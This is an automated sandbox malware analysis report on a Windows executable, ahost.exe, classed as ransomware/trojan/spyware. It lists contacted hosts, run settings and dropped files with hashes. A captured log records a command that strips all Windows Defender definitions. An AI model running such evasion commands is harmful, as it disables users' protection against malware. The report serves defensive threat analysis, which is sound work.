https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true
162.159.135.232	discord.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574323
Start date and time:	2024-12-13 08:36:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	126
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ahost.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@196/60@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 118 Number of non-executed functions: 174
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 23.218.208.109, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, gstatic.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7572 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ahost.exe

Simulations

Behavior and APIs

Time	Type	Description
02:37:13	API Interceptor	8x Sleep call for process: WMIC.exe modified
02:37:15	API Interceptor	151x Sleep call for process: powershell.exe modified
02:37:18	API Interceptor	2x Sleep call for process: svchost.exe modified

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4932370545546512
Encrypted:	false
SSDEEP:	1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaH:cJhXC9lHmutpJyiRDeJ/aUKrDgnmB
MD5:	F8F9530627DDFB2E390536EAD07638B4
SHA1:	27664870B24CCF726CF2F6E05B0CF8BD95302E70
SHA-256:	1EB4D6FC051C3A0A524FFF6D753822C726F07D53CD8632DE71E4D3415C5465DA
SHA-512:	D758F08CACE679032187064C8C4FB7A1114D903A968984731FF55C876DF80C33E48680E54387C20B73333D696B4CA559C05864DB5876BFF2012E665A0A580F0E
Malicious:	false
Reputation:	unknown
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xa3dd87e5, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7217375972350385
Encrypted:	false
SSDEEP:	1536:7SB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:7azaNvFv8V2UW/DLzN/w4wZi
MD5:	7926B6C904DA97FEC6B228B03673E92C
SHA1:	336197B2228B4FB645EADB9A645908E40C37C033
SHA-256:	3C4304942BF2FCBF913C4EA06AAE51468985659ACB083664FAD0918A56A431D4
SHA-512:	1CA2442D459DDCBA3F287FA6AD4F5EAB1459EE27C3D824233C038C59886AF6D83F31BFD9323BB3EA2DF7953ED3F65CC88F3E00C1FD90C84B3FC998F393F40B38
Malicious:	false
Reputation:	unknown
Preview:	...... ...............X\...;...{......................p.D..........{}..%...\|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{....................................u+.%...\|...................../.%...\|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08127735467866633
Encrypted:	false
SSDEEP:	3:3tKYeAHTgClw/fgsCrZClW/tvk3HgYlXall+SHY/Xl+/rQLve:3tKz4Rlwfgs3GhIeAS4M
MD5:	A9218EA51DBA1C89959FEA885CEDBE64
SHA1:	B2612020EB9866B29CABB915C3D00A7FFC277414
SHA-256:	2FC40A1013C54A1DE7836564FC6A8AE4BE19188568189F60612B77A3C1E3E70E
SHA-512:	D8F98AB513FDF47A6082D966AA4C413B19F73441CD2C372C9988758B51855338B512BF500083DC9CFF17C573E7FE54B4D7319361BA2262133ECDE4D50D3C2943
Malicious:	false
Reputation:	unknown
Preview:	.H.e.....................................;...{...%...\|.......{}..............{}......{}.vv_Q.....{}..................../.%...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	675060
Entropy (8bit):	7.924951140329618
Encrypted:	false
SSDEEP:	12288:nT1F1JLeJUvn8uIU4gH6zcuJVgV9zDgRLkXeHGq0d/MBxqCqz0uLrpa:TllHnLIU4gH6tSV9zkRLdL0d/yxqRLM
MD5:	1D18983F56200EAF9F93570AFEB13EB1
SHA1:	7869E91BB90ED5E23B47B8886B0A1DE7B2C10295
SHA-256:	55B72982D018D0CDA7A96EA288CDFA59AF0610AF9709EF76A61AB79814172BB4
SHA-512:	0E18AF796E5F8EB835AE9C55D8360C6C6378B72D77CAC6A6D962005D21255D297E8E66AB3B8D5D5931F046DB6286889AB5629A166E15874048A7F232C323505C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g..Wu...}.,\.\}.........t..FwU...\.C.$.,!.A....M..l.6Y.l.A"...-.P..,D.H..L6.......}..{...9...}..\|c<c.5.\k.s>.H..}G..~.-....3(...(..r..._..k.................3....q.^.d...Yy..W\|....*.-..]...o....zK..,g.G.<0......y_..+/.o.e..r..V^.y./......g...M.1.lF...X...3...LX."....Xy../...2../,.J..Ywn..3??a.3..V~..k.?..<]...0>....v<...+O...<.b....>.!V..9.....hX..O.<../.HX..R...O.......'..U..}b.;....Wv<.g.Q......\|...6.a\|...k.....G~t...2a.#>........=.n..?..<..5.x.....TGbqn...;.v.:a......Zx...n>..w..{VJ~.Y=;.R.].-g..6...]_q....&......}V9...u;.tm.....!.v.u}..~......3K.<.(.{.u..i.v.S..F.\]..w?.\|..s-.3.:.no..S.].J..n..\|t.5.zG9g.....c+...[...S..v.Z..`..%w.U........qC...rn..Z.....,.te7>.:.x@.>'_QYy......L`..O-.U....u.N.....s.q/#1.{.......pE.]..yR9..r.....rS.X.'.\|...q.Uv.....9..._^i..W.=.\|.1..V....w._.o....K'..c...+.9x.{...W..[r..et...Rw.....91.8y ....;/.X.\|t.E.

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1131303970183217
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrN7K80k9+MlWlLehW51IC07K8t:QOaqdmOFdjrc83+kWResLIE8t
MD5:	EF4A00B4A725B8DD32D64D958ADDB350
SHA1:	3F255F03DEFF2FD26283FE34B3FCEA66835513B7
SHA-256:	7080E671D409E31ABB83EAB3BADAA675AD832110D52864096B7145CBC45EF859
SHA-512:	B360106FEB9C7CB592653FFD9788573BA456F16F10F47DC8EC6EA3AC38E180A53B14BD0F3CF43D15A500701EEAB46028B940BF2D2A2AFB3ED709BD6AB338784D
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.2.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES46FF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Dec 13 09:11:16 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.098025864672031
Encrypted:	false
SSDEEP:	24:HyFq9HrwZOTXawZHXwK9GMwZtxNwI+ycuZhNRakSvPNnqS+d:SqwZO+wZAKdwZPm1ulRa3tqSe
MD5:	0412FD62083EC5479B1C31960085E5B7
SHA1:	82D36B28E8DC23FED93C9DAF97BE22AF0B3EC386
SHA-256:	78575C2FB9EFD747DF26CD1B6A740A1B8B2F8DB721CB1EEA264C82FC9C65548E
SHA-512:	88DA5391220C6EC28895842A8F1154060D2E0527BC63F761932F1EBFAB4778615FCB79ED0885965A778AA1AA2630F27B8A6E240B67AB6F5BC837282DA8658952
Malicious:	false
Reputation:	unknown
Preview:	L...4.[g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........R....c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP..................2*.T..)..m...`...........3.......C:\Users\user\AppData\Local\Temp\RES46FF.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.h.b.t.5.s.l.p...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI72722\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49424
Entropy (8bit):	7.815740675307968
Encrypted:	false
SSDEEP:	768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
MD5:	58FC4C56F7F400DE210E98CCB8FDC4B2
SHA1:	12CB7EC39F3AF0947000295F4B50CBD6E7436554
SHA-256:	DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
SHA-512:	AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	7.834005148796091
Encrypted:	false
SSDEEP:	1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
MD5:	79879C679A12FAC03F472463BB8CEFF7
SHA1:	B530763123BD2C537313E5E41477B0ADC0DF3099
SHA-256:	8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
SHA-512:	CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120080
Entropy (8bit):	7.901857200989369
Encrypted:	false
SSDEEP:	3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
MD5:	21D27C95493C701DFF0206FF5F03941D
SHA1:	F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
SHA-256:	38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
SHA-512:	A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36112
Entropy (8bit):	7.6548425105220375
Encrypted:	false
SSDEEP:	768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
MD5:	D6F123C4453230743ADCC06211236BC0
SHA1:	9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
SHA-256:	7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
SHA-512:	F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................\|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88336
Entropy (8bit):	7.9108932581373015
Encrypted:	false
SSDEEP:	1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
MD5:	055EB9D91C42BB228A72BF5B7B77C0C8
SHA1:	5659B4A819455CF024755A493DB0952E1979A9CF
SHA-256:	DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
SHA-512:	C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27408
Entropy (8bit):	7.449801379195215
Encrypted:	false
SSDEEP:	384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
MD5:	513DCE65C09B3ABC516687F99A6971D8
SHA1:	8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
SHA-256:	D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
SHA-512:	621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45328
Entropy (8bit):	7.729647917060796
Encrypted:	false
SSDEEP:	768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
MD5:	14392D71DFE6D6BDC3EBCDBDE3C4049C
SHA1:	622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
SHA-256:	A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
SHA-512:	0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60176
Entropy (8bit):	7.847943448203495
Encrypted:	false
SSDEEP:	1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
MD5:	8CD40257514A16060D5D882788855B55
SHA1:	1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
SHA-256:	7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
SHA-512:	A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68368
Entropy (8bit):	7.86108869046165
Encrypted:	false
SSDEEP:	1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
MD5:	7EF27CD65635DFBA6076771B46C1B99F
SHA1:	14CB35CE2898ED4E871703E3B882A057242C5D05
SHA-256:	6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
SHA-512:	AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip

Download File

Process:	C:\Users\user\Desktop\ahost.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Reputation:	unknown
